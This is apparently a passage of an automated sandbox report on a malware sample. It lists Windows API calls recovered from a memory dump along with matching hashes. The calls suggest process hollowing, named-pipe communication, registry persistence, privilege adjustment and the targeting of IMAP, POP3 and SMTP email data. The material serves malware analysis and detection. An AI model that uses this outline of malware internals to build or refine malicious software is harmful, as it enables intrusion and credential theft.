    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
